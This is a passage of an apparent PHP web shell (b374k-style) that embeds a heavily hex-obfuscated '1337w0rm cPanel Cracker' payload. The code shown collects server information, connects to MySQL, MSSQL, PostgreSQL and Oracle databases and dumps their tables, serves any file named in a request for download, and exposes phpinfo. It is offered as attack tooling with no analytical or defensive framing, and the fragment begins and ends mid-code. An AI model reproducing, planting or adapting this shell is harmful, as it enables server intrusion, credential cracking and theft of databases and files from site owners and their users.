uname
server_ip
your_ip
server_software
disabled_functions
".php_uname() ;?>
".gethostbyname($_SERVER["HTTP_HOST"]);?>


b374k.php


"; } elseif($_POST[scan]=='TraidntUpload') { $TraidntUpload = '<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["y\x74\x71\x73i\x64\x62uw\x62"]="us";${"\x47L\x4fB\x41LS"}["f\x79gf\x77\x66\x70\x70"]="\x63";${"GL\x4fBA\x4cS"}["x\x73suk\x65\x74\x68\x6c\x78"]="c\x6f\x6efi\x67u\x72\x61\x74\x69\x6fn";${"\x47LOB\x41\x4cS"}["z\x6el\x66c\x67"]="\x63\x6f\x6e\x73y\x6d";${"GL\x4f\x42\x41LS"}["x\x72\x6e\x72q\x6e\x65\x65qy\x66\x6e"]="\x64\x69\x72";${"\x47L\x4fB\x41\x4cS"}["\x79\x79\x78p\x67\x74\x69\x66b"]="\x72\x74";${"G\x4c\x4f\x42A\x4c\x53"}["\x73a\x66\x73\x6es\x70\x74q"]="\x67";${"\x47LO\x42\x41\x4c\x53"}["\x6f\x74\x6d\x76w\x75\x79r"]="\x75\x73\x65\x72\x73";${"GL\x4fBA\x4c\x53"}["n\x66d\x6e\x69\x79e"]="\x6c\x69\x6e\x6b";${"\x47L\x4f\x42\x41LS"}["\x6c\x67\x63\x6dkkj"]="\x72\x72";${"G\x4c\x4fBA\x4cS"}["\x75\x75oe\x6c\x64\x6c\x68\x6e"]="\x72";${"\x47\x4cO\x42\x41\x4c\x53"}["\x72shfresl\x68\x6dx"]="\x73\x61\x66\x65_\x6d\x6f\x64\x65";${"\x47\x4cO\x42\x41\x4c\x53"}["m\x6a\x6aj\x73\x79c"]="\x73af\x65\x5fm\x6fd\x65";${"\x47LO\x42\x41\x4cS"}["\x68\x72q\x70\x6a\x6c"]="p\x61\x73s";${"\x47\x4c\x4f\x42A\x4cS"}["\x6dp\x6b\x71z\x62u\x64\x79s\x65"]="u\x73e\x72";${"GL\x4f\x42\x41LS"}["\x73r\x70u\x63\x63\x75ng"]="a1";${"\x47\x4cO\x42\x41LS"}["\x6b\x70m\x62\x72\x6f\x64"]="ok";${"\x47\x4cO\x42A\x4cS"}["\x72\x72\x6b\x66\x76\x75y\x74"]="\x69\x642";${"G\x4c\x4f\x42ALS"}["\x7a\x6d\x65\x72l\x67\x7ak"]="\x612";${"GL\x4f\x42\x41\x4c\x53"}["\x6c\x73cc\x78\x72n\x62\x68w"]="\x75s\x65\x72na\x6d\x65";${"\x47L\x4f\x42\x41\x4cS"}["\x6fi\x62\x62\x66u\x63\x64\x63"]="\x76al\x75e";${"\x47\x4c\x4f\x42\x41L\x53"}["\x75\x63n\x69\x62gy\x67\x64\x71"]="\x65";${"\x47\x4cO\x42\x41\x4c\x53"}["j\x6e\x77\x74\x64\x6ae\x62"]="a\x74t";${"G\x4c\x4f\x42\x41L\x53"}["q\x6fw\x65\x73\x64p"]="\x73\x61h\x61\x63\x6b\x65\x72";${"\x47\x4cOB\x41L\x53"}["\x74\x76oi\x64s\x74"]="\x70\x61t\x68\x63\x6c\x61\x73\x73";${"\x47\x4c\x4f\x42A\x4cS"}["t\x70\x79et\x6cr"]="f\x70";${"\x47LO\x42\x41L\x53"}["\x6c\x76\x74\x66\x6a\x69s\x6b\x77"]="co\x64e";${"\x47\x4cOB\x41L\x53"}["\x73\x6bzm\x6a\x70\x79\x67\x62d\x62"]="\x72\x65s";${"\x47\x4cOB\x41L\x53"}["p\x77\x64\x66\x76\x70\x6e\x69d\x64"]="ar";${"G\x4cO\x42\x41\x4cS"}["\x73\x71o\x77\x63q\x78"]="\x76\x61\x6c\x75e\x73";${"G\x4cO\x42A\x4c\x53"}["\x77c\x67\x72\x6bl"]="k\x65\x79s";${"\x47\x4cOB\x41LS"}["\x69vk\x76t\x69\x64n\x6e"]="\x6eu\x6d";${"\x47\x4cO\x42\x41\x4c\x53"}["b\x74\x79\x67\x77\x6cu"]="\x71\x75\x65\x72\x79s";${"\x47\x4cOB\x41\x4cS"}["\x79\x75i\x72d\x63\x65\x68\x72vu"]="\x73\x71\x6c";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6d\x6e\x6dz\x72t\x64l\x73"]="\x68\x65\x61\x64";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["k\x67\x6arj\x78\x71\x73\x62"]="m\x69\x6d\x65_\x74\x79\x70e";${"\x47\x4cO\x42A\x4cS"}["\x77q\x70\x77\x79\x64\x74\x6d"]="\x63\x6f\x6e\x74\x65nt_\x65\x6e\x63o\x64\x69\x6eg";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x6f\x72\x68khm\x65g\x6e\x74"]="\x66i\x6ced\x75mp";${"\x47\x4cO\x42\x41\x4cS"}["\x73\x77\x73r\x6f\x77m"]="f\x69lena\x6d\x65";${"G\x4cO\x42\x41L\x53"}["\x72\x74rn\x6d\x73w\x72gb\x74"]="\x66i\x6c\x65";${"\x47L\x4f\x42AL\x53"}["\x78mc\x68\x78\x77\x73\x70r"]="\x76";${"GL\x4f\x42A\x4cS"}["\x6f\x79k\x73sljt\x76\x6cz"]="\x6b";${"\x47\x4cO\x42A\x4cS"}["\x73\x7a\x66y\x6ao\x70"]="i";${"\x47\x4c\x4f\x42AL\x53"}["\x75\x6f\x71g\x70n\x78ob\x69\x71h"]="\x74\x61\x62\x6ce";${"G\x4cO\x42\x41L\x53"}["f\x62\x61\x67\x78o\x69\x6dc\x66"]="\x71u\x65ry";${"\x47\x4c\x4f\x42AL\x53"}["j\x75\x78\x73\x62\x70"]="\x65\x72\x72\x6f\x72";${"\x47\x4cOBAL\x53"}["s\x67\x79\x6b\x6fg\x67\x6c\x6er\x64"]="st\x72";${"GLO\x42A\x4c\x53"}["\x70\x68ym\x7a\x69s\x74\x75\x75\x71"]="c\x68e\x63\x6b\x65\x64";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68\x72sw\x77r\x63\x70\x72\x77"]="\x72\x65\x74";${"\x47L\x4f\x42\x41\x4cS"}["\x77u\x79\x73trt"]="t\x79\x70e";echo "\x3c\x68t\x6d\x6c\x3e\n<t\x69tl\x65\x3e\x31\x333\x37w0\x72\x6d\x20| cP\x61\x6e\x65l\x20\x43r\x61c\x6b\x65\x72\x3c/t\x69\x74l\x65\x3e\n\x3cm\x65t\x61 \x68t\x74p-\x65\x71ui\x76\x3d\x22\x43\x6fn\x74\x65\x6e\x74-Typ\x65\x22\x20\x63\x6f\x6eten\x74=\x22te\x78\x74/\x68\x74\x6dl\x3b \x63\x68ars\x65t=u\x74\x66-\x38\x22\x20/>\n";@set_time_limit(0);@error_reporting(0);echo"\x3ch\x65\x61d>\n\n<s\x74yle>\n\t \x20  \n\t \x20 \x20/*\x20R\x65tnOH\x61cK 2\x30\x313\x20*/\n\n\n\x20    \x20 \x20   \x20bo\x64y{c\x6flo\x72:#\x366\x46F0\x30\x3b fon\x74-\x73i\x7ae:\x20\x31\x32p\x78;\x20\x66\x6fn\x74-\x66a\x6di\x6cy: s\x65ri\x66\x3b\x20b\x61c\x6b\x67\x72o\x75\x6ed-c\x6fl\x6f\x72: b\x6ca\x63\x6b\x3b b\x61\x63\x6b\x67r\x6f\x75\x6ed-i\x6dag\x65: u\x72l(\x68\x74\x74p://w\x77w.wa\x6cl\x73\x61v\x65.c\x6fm/w\x61\x6clp\x61\x70e\x72s/\x319\x32\x30x\x31\x3080/\x61\x6c\x69\x65\x6e-\x6e\x61ture/\x36011\x34\x37/al\x69e\x6e-n\x61tur\x65-\x6datrix-6\x301\x314\x37.jp\x67);\n\t\t\t\t\x62ackg\x72\x6fu\x6ed-\x72\x65\x70\x65\x61t:\x20no-r\x65\x70\x65\x61t\x3b\n\t\t\t\tb\x61\x63\x6bg\x72o\x75nd-p\x6f\x73\x69\x74\x69\x6fn: \x62ot\x74\x6fm\x3b }\n\x20 \x20\x20 \x20\x20   \x20 t\x64\x20{\x62orde\x72:\x201\x70\x78\x20\x73o\x6cid\x20\x23\x30\x30\x46F\x300\x3b \x62\x61c\x6bg\x72o\x75\x6ed-c\x6f\x6c\x6f\x72:\x23001f\x300;\x20p\x61ddin\x67: 2px; fo\x6et-\x73\x69\x7ae: 1\x32p\x78; \x63\x6f\x6c\x6f\x72: \x233\x33F\x460\x30;}\n    \x20 \x20\x20\x20\x20 \x20td:h\x6f\x76e\x72{back\x67\x72\x6fu\x6e\x64-c\x6f\x6co\x72:\x20\x62la\x63\x6b\x3b \x63o\x6cor: #\x333\x46\x46\x30\x30\x3b}\n\x20 \x20\x20  \x20\x20\x20   \x69n\x70\x75t{ba\x63\x6b\x67ro\x75n\x64-\x63o\x6co\x72: b\x6cac\x6b;\x20\x63\x6fl\x6fr: \x23\x30\x30F\x46\x300;\x20\x62\x6fr\x64\x65r:\x201p\x78 \x73\x6fl\x69\x64\x20\x72ed;}\n   \x20\x20       \x69np\x75t:\x68\x6f\x76\x65\x72{bac\x6bg\x72\x6f\x75\x6ed-\x63\x6f\x6c\x6f\x72: #0\x30\x3660\x30;}\n  \x20\x20\x20\x20\x20 \x20\x20 \x20\x74ex\x74\x61\x72\x65\x61{\x62\x61\x63kg\x72o\x75n\x64-\x63ol\x6f\x72:\x20\x62l\x61ck\x3b\x20\x63o\x6c\x6f\x72: #00\x46\x46\x30\x30;\x20\x62\x6f\x72d\x65r:\x20\x31px \x73ol\x69\x64\x20red;}\n\x20\x20 \x20   \x20 \x20 \x20\x61\x20{\x74ex\x74-\x64ec\x6f\x72a\x74\x69\x6f\x6e:\x20\x6eon\x65; col\x6fr: #66FF0\x30; f\x6f\x6e\x74-\x77\x65i\x67\x68t:\x20b\x6fld\x3b}\n\x20   \x20 \x20 \x20\x20\x20 \x61:\x68o\x76e\x72 {\x63olor:\x20\x23\x30\x30F\x46\x30\x30;}\n  \x20\x20\x20\x20  \x20\x20\x20 select{\x62a\x63kgro\x75n\x64-\x63\x6flor:\x20b\x6c\x61\x63\x6b;\x20c\x6fl\x6fr:\x20\x230\x30\x46F0\x30;}\n\x20   \x20\x20 \x20\x20   #\x6d\x61\x69n{\x62o\x72\x64er-bot\x74o\x6d: \x31p\x78\x20\x73\x6f\x6cid\x20\x233\x33\x46\x4600\x3b\x20\x70\x61d\x64\x69n\x67: \x35\x70x;\x20te\x78t-al\x69gn: cent\x65\x72\x3b}\n\x20\x20    \x20  \x20  #m\x61i\x6e a{\x70\x61d\x64\x69ng-\x72igh\x74:\x201\x35\x70\x78\x3b co\x6c\x6f\x72:#\x30\x30C\x43\x300; f\x6fnt-si\x7a\x65: 12\x70x; \x66on\x74-fa\x6dily:\x20\x61\x72\x69\x61\x6c; t\x65xt-d\x65\x63\x6f\x72\x61\x74i\x6f\x6e:\x20\x6eo\x6ee\x3b\x20}\n \x20 \x20\x20   \x20 \x20 #m\x61in\x20\x61:\x68\x6f\x76\x65\x72{co\x6co\x72:\x20\x23\x300F\x46\x300; t\x65xt-\x64\x65\x63orat\x69on:\x20u\x6e\x64er\x6c\x69ne;}\n\x20\x20\x20 \x20   \x20  \x20\x23\x62ar{\x77\x69\x64t\x68: 1\x30\x30%\x3b\x20p\x6f\x73i\x74\x69o\x6e:\x20fi\x78e\x64\x3b b\x61\x63\x6b\x67\x72\x6fu\x6e\x64-c\x6f\x6cor: \x62lack;\x20b\x6ftt\x6fm: 0\x3b \x66on\x74-si\x7a\x65:\x20\x310p\x78;\x20\x6c\x65ft:\x200;\x20bo\x72\x64\x65r-\x74o\x70:\x20\x31p\x78 s\x6f\x6c\x69d \x23F\x46\x46\x46\x46\x46\x3b \x68\x65\x69\x67\x68t:\x201\x32\x70\x78;\x20\x70\x61d\x64\x69\x6e\x67:\x20\x35\x70\x78\x3b}\n\x3c/\x73tyl\x65\x3e\n\n\x3c/head\x3e\n";function in($type,$name,$size,$value,$checked=0){${"\x47\x4c\x4fBA\x4c\x53"}["\x6ay\x61f\x79\x64v\x64\x65"]="\x76\x61\x6c\x75\x65";${"\x47\x4cOBA\x4cS"}["\x74w\x6e\x69rg\x76"]="n\x61\x6de";${"\x47\x4c\x4fB\x41L\x53"}["\x6f\x73em\x6a\x68\x76"]="\x73\x69\x7a\x65";${"\x47\x4c\x4f\x42A\x4cS"}["qk\x69\x72\x64\x66t\x6d"]="re\x74";${${"\x47\x4cO\x42\x41LS"}["qk\x69\x72\x64\x66tm"]}="\x3c\x69\x6ep\x75\x74\x20\x74\x79\x70e\x3d".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x75\x79\x73\x74\x72\x74"]}."\x20n\x61me\x3d".${${"\x47\x4cOB\x41\x4c\x53"}["\x74\x77\x6ei\x72\x67\x76"]}."\x20";if(${${"\x47\x4cO\x42A\x4c\x53"}["o\x73\x65\x6d\x6a\x68\x76"]}!=0){$pefrsvzrdas="\x73\x69\x7a\x65";${${"\x47\x4cO\x42\x41LS"}["\x68\x72swwr\x63\x70r\x77"]}.="\x73ize=".${$pefrsvzrdas}." ";}${${"\x47LO\x42ALS"}["\x68rsw\x77rcp\x72w"]}.="v\x61\x6c\x75\x65\x3d\"".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["jya\x66\x79\x64\x76\x64e"]}."\x22";if(${${"\x47\x4cOB\x41\x4cS"}["p\x68\x79m\x7ai\x73t\x75\x75q"]})${${"GL\x4f\x42\x41\x4c\x53"}["h\x72\x73\x77wrc\x70\x72w"]}.="\x20\x63\x68eck\x65\x64";return${${"\x47\x4cO\x42A\x4cS"}["\x68\x72\x73\x77w\x72\x63\x70\x72\x77"]}.">";}class my_sql{var$host='localhost';var$port='';var$user='';var$pass='';var$base='';var$db='';var$connection;var$res;var$error;var$rows;var$columns;var$num_rows;var$num_fields;var$dump;function connect(){$ifybir="\x73tr";$rwzpnfgh="\x65\x72ro\x72";switch($this->db){case"MySQ\x4c":if(empty($this->port)){$this->port="\x3330\x36";}if(!function_exists("mys\x71\x6c\x5fco\x6e\x6eec\x74"))return 0;$this->connection=@mysql_connect($this->host.":".$this->port,$this->user,$this->pass);if(is_resource($this->connection))return 1;$this->error=@mysql_errno()." :\x20".@mysql_error();break;case"\x4dSS\x51L":if(empty($this->port)){$this->port="\x31\x343\x33";}if(!function_exists("m\x73sq\x6c_c\x6f\x6e\x6e\x65c\x74"))return 0;$this->connection=@mssql_connect($this->host.",".$this->port,$this->user,$this->pass);if($this->connection)return 1;$this->error="\x43a\x6e't\x20\x63\x6f\x6e\x6eect t\x6f\x20se\x72\x76er";break;case"\x50o\x73tg\x72eS\x51\x4c":if(empty($this->port)){$this->port="\x35432";}${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73g\x79\x6bo\x67\x67ln\x72d"]}="\x68o\x73t='".$this->host."'\x20p\x6fr\x74\x3d\x27".$this->port."' use\x72=\x27".$this->user."\x27\x20p\x61\x73\x73\x77\x6fr\x64=\x27".$this->pass."'\x20db\x6e\x61me=\x27".$this->base."'";if(!function_exists("\x70\x67\x5fconnec\x74"))return 0;$this->connection=@pg_connect(${$ifybir});if(is_resource($this->connection))return 1;$this->error=@pg_last_error($this->connection);break;case"\x4f\x72a\x63\x6c\x65":if(!function_exists("\x6f\x63i\x6c\x6f\x67o\x6e"))return 0;$this->connection=@ocilogon($this->user,$this->pass,$this->base);if(is_resource($this->connection))return 1;${${"\x47\x4cO\x42A\x4cS"}["\x6au\x78\x73bp"]}=@ocierror();$this->error=${$rwzpnfgh}["m\x65\x73sag\x65"];break;}return 0;}function select_db(){switch($this->db){case"\x4d\x79\x53\x51L":if(@mysql_select_db($this->base,$this->connection))return 1;$this->error=@mysql_errno()."\x20:\x20".@mysql_error();break;case"M\x53SQ\x4c":if(@mssql_select_db($this->base,$this->connection))return 1;$this->error="\x43an\x27t\x20s\x65l\x65ct\x20database";break;case"Po\x73\x74\x67\x72\x65SQL":return 1;break;case"O\x72a\x63l\x65":return 1;break;}return 0;}function query($query){${"\x47\x4c\x4f\x42\x41LS"}["\x68\x76\x72\x68\x73\x6d\x66fn\x62"]="qu\x65\x72y";$this->res=$this->error="";${"\x47L\x4f\x42\x41\x4c\x53"}["\x7a\x63\x74hp\x62\x66\x75x\x75\x79\x6d"]="\x71\x75\x65r\x79";$jmpmamqr="\x71ue\x72y";switch($this->db){case"MyS\x51L":if(false===($this->res=@mysql_query("/*".chr(0)."*/".${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x66\x62a\x67xo\x69\x6dc\x66"]},$this->connection))){$this->error=@mysql_error($this->connection);return 0;}else if(is_resource($this->res)){return 1;}return 2;break;case"M\x53\x53\x51L":if(false===($this->res=@mssql_query(${${"\x47L\x4f\x42A\x4cS"}["\x68v\x72\x68sm\x66fn\x62"]},$this->connection))){$this->error="Q\x75\x65r\x79 e\x72\x72o\x72";return 0;}else if(@mssql_num_rows($this->res)>0){return 1;}return 2;break;case"\x50o\x73\x74g\x72e\x53\x51L":if(false===($this->res=@pg_query($this->connection,${$jmpmamqr}))){$this->error=@pg_last_error($this->connection);return 0;}else if(@pg_num_rows($this->res)>0){return 1;}return 2;break;case"O\x72\x61\x63l\x65":if(false===($this->res=@ociparse($this->connection,${${"\x47\x4c\x4fB\x41\x4c\x53"}["z\x63\x74\x68pb\x66\x75\x78u\x79\x6d"]}))){$this->error="\x51\x75\x65\x72\x79 \x70a\x72\x73e\x20\x65\x72\x72\x6f\x72";}else{${"\x47LO\x42A\x4c\x53"}["\x75\x65o\x6bg\x63\x61\x77\x78"]="\x65r\x72\x6f\x72";if(@ociexecute($this->res)){if(@ocirowcount($this->res)!=0)return 2;return 1;}${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6auxsb\x70"]}=@ocierror();$this->error=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x65\x6f\x6b\x67\x63\x61\x77x"]}["\x6des\x73a\x67\x65"];}break;}return 0;}function get_result(){$this->rows=array();$this->columns=array();$this->num_rows=$this->num_fields=0;switch($this->db){case"\x4d\x79S\x51\x4c":$this->num_rows=@mysql_num_rows($this->res);$this->num_fields=@mysql_num_fields($this->res);while(false!==($this->rows[]=@mysql_fetch_assoc($this->res)));@mysql_free_result($this->res);if($this->num_rows){$this->columns=@array_keys($this->rows[0]);return 1;}break;case"M\x53\x53QL":$this->num_rows=@mssql_num_rows($this->res);$this->num_fields=@mssql_num_fields($this->res);while(false!==($this->rows[]=@mssql_fetch_assoc($this->res)));@mssql_free_result($this->res);if($this->num_rows){$this->columns=@array_keys($this->rows[0]);return 1;}break;case"P\x6f\x73\x74gr\x65SQ\x4c":$this->num_rows=@pg_num_rows($this->res);$this->num_fields=@pg_num_fields($this->res);while(false!==($this->rows[]=@pg_fetch_assoc($this->res)));@pg_free_result($this->res);if($this->num_rows){$this->columns=@array_keys($this->rows[0]);return 1;}break;case"Ora\x63\x6ce":$this->num_fields=@ocinumcols($this->res);while(false!==($this->rows[]=@oci_fetch_assoc($this->res)))$this->num_rows++;@ocifreestatement($this->res);if($this->num_rows){$this->columns=@array_keys($this->rows[0]);return 1;}break;}return 0;}function dump($table){if(empty(${${"GLO\x42A\x4c\x53"}["u\x6f\x71\x67pn\x78\x6fbi\x71\x68"]}))return 0;$dhzujdwejgi="\x74a\x62\x6c\x65";$this->dump=array();$this->dump[0]="\x23#";$this->dump[1]="#\x23\x20---------------------------------------\x20";$this->dump[2]="\x23#  \x43\x72\x65\x61te\x64: ".date("\x64/m/Y \x48:i:s");${"GL\x4fB\x41LS"}["\x73a\x63\x6e\x62io\x78\x64xu"]="t\x61b\x6c\x65";$this->dump[3]="\x23\x23 \x44ata\x62as\x65: ".$this->base;$bkcngykc="i";$this->dump[4]="\x23\x23 \x20  T\x61b\x6c\x65:\x20".${$dhzujdwejgi};$this->dump[5]="#\x23\x20--------------------------------------- ";switch($this->db){case"MyS\x51\x4c":$this->dump[0]="#\x23 M\x79\x53Q\x4c\x20dump";if($this->query("/*".chr(0)."*/\x20\x53H\x4fW CR\x45\x41\x54\x45\x20T\x41B\x4cE\x20\x60".${${"G\x4c\x4fB\x41L\x53"}["u\x6f\x71\x67\x70\x6e\x78o\x62i\x71\x68"]}."`")!=1)return 0;if(!$this->get_result())return 0;$this->dump[]=$this->rows[0]["\x43\x72\x65at\x65 \x54a\x62l\x65"].";";$this->dump[]="#\x23 ---------------------------------------\x20";if($this->query("/*".chr(0)."*/ SE\x4c\x45\x43\x54 *\x20\x46RO\x4d `".${${"\x47\x4c\x4fB\x41L\x53"}["\x75\x6f\x71\x67\x70\x6e\x78obi\x71h"]}."`")!=1)return 0;if(!$this->get_result())return 0;for(${${"\x47\x4c\x4f\x42AL\x53"}["\x73\x7af\x79\x6a\x6fp"]}=0;${${"\x47LO\x42\x41\x4cS"}["s\x7af\x79\x6a\x6f\x70"]}<$this->num_rows;${${"\x47\x4cO\x42A\x4cS"}["\x73\x7a\x66\x79j\x6f\x70"]}++){$yhoaotjw="i";${"G\x4cOB\x41\x4c\x53"}["v\x6al\x64\x76gy\x6a"]="ta\x62\x6c\x65";${"GLOBAL\x53"}["\x68\x78\x68\x6cf\x63\x71y\x65\x75\x71"]="\x6b";${"\x47\x4c\x4fBA\x4cS"}["\x71e\x73\x6a\x61\x77\x6d\x6d\x63"]="\x76";foreach($this->rows[${${"GLO\x42A\x4cS"}["s\x7a\x66yj\x6fp"]}]as${${"G\x4cO\x42\x41LS"}["\x68\x78\x68\x6cf\x63qye\x75\x71"]}=>${${"\x47\x4c\x4fB\x41\x4c\x53"}["q\x65sj\x61w\x6d\x6dc"]}){${"\x47\x4cO\x42\x41L\x53"}["\x6f\x78w\x74\x64\x72\x62\x72"]="\x69";$this->rows[${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6f\x78\x77tdr\x62\x72"]}][${${"\x47\x4cO\x42\x41L\x53"}["o\x79\x6b\x73\x73\x6c\x6a\x74\x76l\x7a"]}]=@mysql_real_escape_string(${${"\x47\x4cO\x42A\x4c\x53"}["\x78mc\x68\x78\x77s\x70\x72"]});}$this->dump[]="I\x4eS\x45\x52\x54 \x49\x4e\x54O\x20\x60".${${"GL\x4f\x42\x41LS"}["\x76\x6a\x6c\x64\x76\x67\x79\x6a"]}."\x60 (`".@implode("`,\x20`",$this->columns)."`)\x20V\x41LUE\x53\x20('".@implode("',\x20\x27",$this->rows[${$yhoaotjw}])."\x27);";}break;case"\x4d\x53\x53\x51L":$this->dump[0]="\x23\x23\x20\x4dS\x53\x51L\x20du\x6d\x70";if($this->query("\x53E\x4cECT *\x20\x46ROM ".${${"G\x4cO\x42\x41L\x53"}["sa\x63\x6eb\x69\x6fx\x64x\x75"]})!=1)return 0;if(!$this->get_result())return 0;for(${${"G\x4cO\x42\x41\x4cS"}["sz\x66y\x6aop"]}=0;${$bkcngykc}<$this->num_rows;${${"G\x4cOBA\x4c\x53"}["\x73zfyjop"]}++){${"G\x4cO\x42\x41L\x53"}["\x6c\x6c\x72\x73\x74\x75\x67\x6fct"]="\x74\x61b\x6ce";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x71\x71\x79\x73\x6e"]="v";$ydvriw="\x6b";foreach($this->rows[${${"\x47LO\x42\x41\x4cS"}["sz\x66y\x6a\x6f\x70"]}]as${$ydvriw}=>${${"\x47\x4c\x4f\x42AL\x53"}["nqq\x79\x73\x6e"]}){${"\x47\x4c\x4f\x42\x41LS"}["\x73\x65c\x70\x63\x6b"]="\x6b";$othlsxnpnfth="\x76";$lruljrso="i";$this->rows[${$lruljrso}][${${"\x47\x4c\x4f\x42AL\x53"}["\x73ecp\x63k"]}]=@addslashes(${$othlsxnpnfth});}$this->dump[]="\x49\x4e\x53ER\x54\x20I\x4e\x54\x4f ".${${"\x47L\x4f\x42\x41L\x53"}["l\x6cr\x73\x74\x75\x67\x6f\x63t"]}."\x20(".@implode(",\x20",$this->columns).")\x20V\x41L\x55\x45\x53\x20(\x27".@implode("\x27, '",$this->rows[${${"GL\x4f\x42\x41\x4c\x53"}["\x73z\x66\x79\x6a\x6f\x70"]}])."\x27)\x3b";}break;case"P\x6fstgreS\x51L":$this->dump[0]="#\x23\x20\x50\x6f\x73t\x67\x72e\x53\x51L du\x6d\x70";if($this->query("SE\x4c\x45CT * FROM\x20".${${"G\x4cO\x42\x41\x4c\x53"}["\x75\x6f\x71\x67\x70\x6e\x78\x6f\x62\x69\x71\x68"]})!=1)return 0;if(!$this->get_result())return 0;for(${${"\x47\x4c\x4f\x42\x41L\x53"}["s\x7a\x66y\x6a\x6f\x70"]}=0;${${"GL\x4f\x42AL\x53"}["\x73zfyj\x6f\x70"]}<$this->num_rows;${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73zfy\x6a\x6fp"]}++){foreach($this->rows[${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73\x7a\x66yj\x6f\x70"]}]as${${"GL\x4fB\x41\x4c\x53"}["\x6f\x79\x6b\x73\x73\x6c\x6at\x76\x6c\x7a"]}=>${${"\x47\x4cO\x42\x41\x4c\x53"}["\x78m\x63\x68x\x77\x73\x70\x72"]}){${"G\x4cO\x42A\x4c\x53"}["u\x71c\x6co\x76\x78\x6e"]="k";$iksdotc="\x69";$this->rows[${$iksdotc}][${${"\x47L\x4f\x42A\x4cS"}["u\x71\x63lov\x78n"]}]=@addslashes(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78m\x63h\x78\x77\x73\x70r"]});}$this->dump[]="\x49\x4e\x53\x45R\x54 I\x4eTO\x20".${${"\x47L\x4f\x42\x41L\x53"}["\x75\x6f\x71\x67\x70\x6ex\x6f\x62\x69qh"]}." (".@implode(", ",$this->columns).")\x20V\x41L\x55E\x53 (\x27".@implode("', '",$this->rows[${${"GL\x4f\x42\x41L\x53"}["s\x7a\x66y\x6a\x6f\x70"]}])."\x27);";}break;case"\x4f\x72\x61cl\x65":$this->dump[0]="\x23\x23\x20\x4f\x52A\x43\x4cE\x20\x64\x75m\x70";$this->dump[]="\x23\x23\x20und\x65\x72\x20\x63o\x6e\x73tru\x63tio\x6e";break;default:return 0;break;}return 1;}function close(){switch($this->db){case"M\x79\x53\x51L":@mysql_close($this->connection);break;case"\x4dSSQL":@mssql_close($this->connection);break;case"\x50\x6fst\x67re\x53\x51\x4c":@pg_close($this->connection);break;case"\x4fra\x63le":@oci_close($this->connection);break;}}function affected_rows(){switch($this->db){case"\x4dyS\x51\x4c":return@mysql_affected_rows($this->res);break;case"\x4d\x53\x53Q\x4c":return@mssql_affected_rows($this->res);break;case"\x50\x6f\x73\x74\x67re\x53QL":return@pg_affected_rows($this->res);break;case"\x4fr\x61\x63\x6c\x65":return@ocirowcount($this->res);break;default:return 0;break;}}}if(!empty($_POST["\x63\x63\x63c"])&&$_POST["\x63\x63cc"]=="d\x6fwnloa\x64\x5f\x66i\x6c\x65"&&!empty($_POST["\x64\x5f\x6e\x61me"])){if(!${${"\x47\x4c\x4f\x42A\x4cS"}["\x72\x74\x72\x6e\x6d\x73\x77\x72\x67\x62t"]}=@fopen($_POST["\x64\x5f\x6eame"],"r")){err(1,$_POST["d\x5fn\x61\x6d\x65"]);$_POST["\x63ccc"]="";}else{@ob_clean();$frqcdbegrd="\x6di\x6de_\x74\x79\x70e";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x77\x73\x72\x6f\x77\x6d"]}=@basename($_POST["\x64\x5f\x6e\x61m\x65"]);${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x6f\x72\x68\x6bh\x6d\x65\x67\x6e\x74"]}=@fread(${${"\x47\x4cOBA\x4c\x53"}["r\x74rnmswr\x67\x62\x74"]},@filesize($_POST["d_\x6eame"]));fclose(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x72\x74\x72n\x6ds\x77\x72g\x62\x74"]});${${"\x47\x4c\x4f\x42\x41L\x53"}["wq\x70\x77\x79dt\x6d"]}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6b\x67j\x72jx\x71\x73b"]}="";${"G\x4c\x4f\x42A\x4c\x53"}["\x74\x67\x67\x75b\x69\x62y\x75\x70\x77\x69"]="\x66i\x6c\x65n\x61\x6d\x65";$vkxhmlt="\x66\x69\x6ce\x64u\x6dp";$ougepg="c\x6f\x6e\x74\x65n\x74\x5f\x65\x6ec\x6fd\x69\x6eg";compress(${${"\x47\x4c\x4fB\x41\x4c\x53"}["sw\x73\x72\x6fw\x6d"]},${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6b\x6f\x72\x68\x6b\x68\x6d\x65\x67\x6et"]},$_POST["c\x6f\x6d\x70r\x65s\x73"]);if(!empty(${$ougepg})){${"\x47\x4c\x4fBA\x4c\x53"}["\x65\x74d\x74\x78\x6a\x65\x6fi"]="c\x6f\x6e\x74\x65\x6e\x74\x5fe\x6e\x63o\x64\x69n\x67";header("\x43o\x6e\x74\x65nt-\x45nco\x64\x69n\x67: ".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x74d\x74\x78\x6a\x65\x6f\x69"]});}header("\x43onte\x6et-\x74y\x70e: ".${$frqcdbegrd});header("Co\x6eten\x74-\x64is\x70\x6f\x73i\x74\x69\x6f\x6e:\x20a\x74tac\x68ment\x3b \x66il\x65\x6ea\x6d\x65\x3d\"".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x67g\x75b\x69b\x79\x75\x70\x77\x69"]}."\";");echo${$vkxhmlt};exit();}}if(isset($_GET["p\x68\x70\x69\x6e\x66\x6f"])){echo@phpinfo();echo"<b\x72><\x64i\x76\x20a\x6ci\x67n=\x63e\x6e\x74\x65\x72\x3e\x3c\x66on\x74 \x66ac\x65\x3dVer\x64a\x6e\x61 \x73\x69\x7ae\x3d-2\x3e<b>[\x20\x3c\x61 hr\x65\x66=".$_SERVER["\x50H\x50_SE\x4cF"].">\x42ACK\x3c/a> 